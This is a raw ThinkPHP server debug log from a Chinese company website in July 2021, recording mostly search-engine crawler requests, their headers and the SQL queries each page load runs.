[ info ] [ PARAM ] array ( '/ajaxArea_php' => '', 'id' => '1000139', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T15:59:48+08:00 ] 116.179.37.235 POST /index/index/proapi.html [ info ] www.kinsana.cn/index/index/proapi.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:1,905.78kb] [文件加载:49] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'index', 2 => 'proapi', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip', 'x-requested-with' => 'XMLHttpRequest', 'tmphost' => 'www.kinsana.cn', 'resource-type' => '13', 'referer' => 'http://www.kinsana.cn/', 'proxy-connection' => 'Keep-Alive', 'origin' => 'http://www.kinsana.cn', 'fetchergroup' => 'UNICOM', 'fetchaddr' => '114.215.150.118, 114.215.150.118', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-language' => 'zh-CN,zh;q=0.9;q=0.9,en;q=0.8;q=0.8,en-GB;q=0.7;q=0.7,en-US;q=0.6;q=0.6,fr;q=0.5;q=0.5', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'content-length' => '7', 'user-agent' => 'Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/index/proapi_html' => '', 'cates' => '5', ) [ info ] [ RUN ] app\index\controller\Index->proapi[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`sm_img`,`name`,`pro_name`,`sp` FROM `product` WHERE `cate_id` = 5 AND `is_top` = 1 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 4 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T16:07:53+08:00 ] 112.5.37.18 GET /data/admin/allowurl.txt [ info ] www.kinsana.cn/data/admin/allowurl.txt [运行时间:0.031250s][吞吐率:32.00req/s] [内存消耗:1,069.09kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'data', 1 => 'admin', 2 => 'allowurl.txt', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/data/admin/allowurl_txt' => '', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T16:08:42+08:00 ] 106.11.155.94 GET /index/news/xwxq/id/81.html [ info ] www.kinsana.cn/index/news/xwxq/id/81.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,200.10kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/81_html' => '', 'id' => '81', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 81 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 81 [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T16:13:20+08:00 ] 118.184.177.52 GET /index/news/xwxq/id/148.html [ info ] www.kinsana.cn/index/news/xwxq/id/148.html [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,198.18kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/148_html' => '', 'id' => '148', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 148 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 148 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T16:14:02+08:00 ] 123.183.224.173 GET /index/news/xwxq/id/44.html [ info ] www.kinsana.cn/index/news/xwxq/id/44.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,172.31kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/44_html' => '', 'id' => '44', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 44 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 44 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T16:16:57+08:00 ] 185.191.171.5 GET /index/news/hydtnews.html?page=15 [ info ] xn--vhqsn14am88k.com/index/news/hydtnews.html?page=15 [运行时间:0.328125s][吞吐率:3.05req/s] [内存消耗:2,083.85kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'hydtnews', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/news/hydtnews_html' => '', 'page' => '15', ) [ info ] [ RUN ] app\index\controller\News->hydtnews[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\hydtnews.htm [ array ( 0 => 'newRes', 1 => 'page', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `news` WHERE `cate_id` = '2' AND `state` = '1' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 112,8 [ RunTime:0.187500s ] --------------------------------------------------------------- [ 2021-07-16T16:34:17+08:00 ] 49.7.21.119 GET /index/zp/rczp.html [ info ] www.kinsana.cn/index/zp/rczp.html [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:1,960.57kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'zp', 2 => 'rczp', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/zp/rczp_html' => '', ) [ info ] [ RUN ] app\index\controller\Zp->rczp[ D:\WWW\kinsasa\application\index\controller\Zp.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\zp\rczp.htm [ array ( 0 => 'res', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `zp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `zp` WHERE `state` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T16:43:17+08:00 ] 203.208.60.51 POST /api/index/procontent [ info ] www.kinsana.cn/api/index/procontent [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,695.99kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'procontent', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '6', 'x-requested-with' => 'XMLHttpRequest', 'referer' => 'http://www.kinsana.cn/m/cpxq.html?id=112', 'origin' => 'http://www.kinsana.cn', 'cookie' => 'safedog-flow-item=', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-language' => 'en-US', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/procontent' => '', 'id' => '112', ) [ info ] [ RUN ] app\api\controller\Index->procontent[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `a` INNER JOIN `type` `c` ON `a`.`type_id`=`c`.`id` WHERE `a`.`id` = '112' LIMIT 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T16:51:25+08:00 ] 106.38.241.188 GET /index/contanct/yfzx.html [ info ] www.kinsana.cn/index/contanct/yfzx.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,325.82kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'yfzx', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/yfzx_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->yfzx[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\yfzx.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T17:01:42+08:00 ] 223.104.187.190 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.23kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip', 'connection' => 'close', 'host' => 'www.kinsana.cn', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; AQM-AL10 Build/HONORAQM-AL10; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/75.0.3770.156 Mobile Safari/537.36 TTWebView/0751130027001', 'cache-control' => 'no-cache', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T17:08:57+08:00 ] 203.208.60.101 GET /index/product/cpxq.html?id=131 [ info ] www.kinsana.cn/index/product/cpxq.html?id=131 [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,011.78kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'if-modified-since' => 'Thu, 15 Jul 2021 23:36:32 GMT', 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => 'text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8', 'connection' => 'close', 'amp-cache-transform' => 'google;v="1..7"', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/product/cpxq_html' => '', 'id' => '131', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '131' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 131 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T17:15:44+08:00 ] 218.0.50.119 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.00kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept' => '*/*', 'accept-encoding' => 'gzip, deflate', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T17:19:44+08:00 ] 42.236.10.116 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.63kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider', 'connection' => 'close', 'accept-language' => 'zh-CN', 'accept' => '*/*', 'cookie' => '', 'referer' => 'http://www.kinsana.cn/', 'accept-encoding' => 'deflate, gzip', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T17:27:55+08:00 ] 123.183.224.91 GET /index/contanct/zxly.html [ info ] www.kinsana.cn/index/contanct/zxly.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,325.84kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'zxly', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/zxly_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->zxly[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\zxly.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T17:35:08+08:00 ] 106.11.153.83 GET /index/news/xwxq/id/181.html [ info ] www.kinsana.cn/index/news/xwxq/id/181.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,174.38kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/181_html' => '', 'id' => '181', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 181 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 181 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T17:39:09+08:00 ] 203.208.60.101 GET /index/zp/rczp.html [ info ] www.kinsana.cn/index/zp/rczp.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,961.77kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'zp', 2 => 'rczp', ), ) [ info ] [ HEADER ] array ( 'if-modified-since' => 'Thu, 15 Jul 2021 14:00:05 GMT', 'accept-encoding' => 'gzip, deflate, br', 'user-agent' => 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'from' => 'googlebot(at)googlebot.com', 'accept' => 'text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8', 'connection' => 'close', 'amp-cache-transform' => 'google;v="1..7"', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/zp/rczp_html' => '', ) [ info ] [ RUN ] app\index\controller\Zp->rczp[ D:\WWW\kinsasa\application\index\controller\Zp.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\zp\rczp.htm [ array ( 0 => 'res', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `zp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `zp` WHERE `state` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T17:40:31+08:00 ] 218.0.50.119 GET // [ info ] www.kinsana.cn// [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,016.01kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array 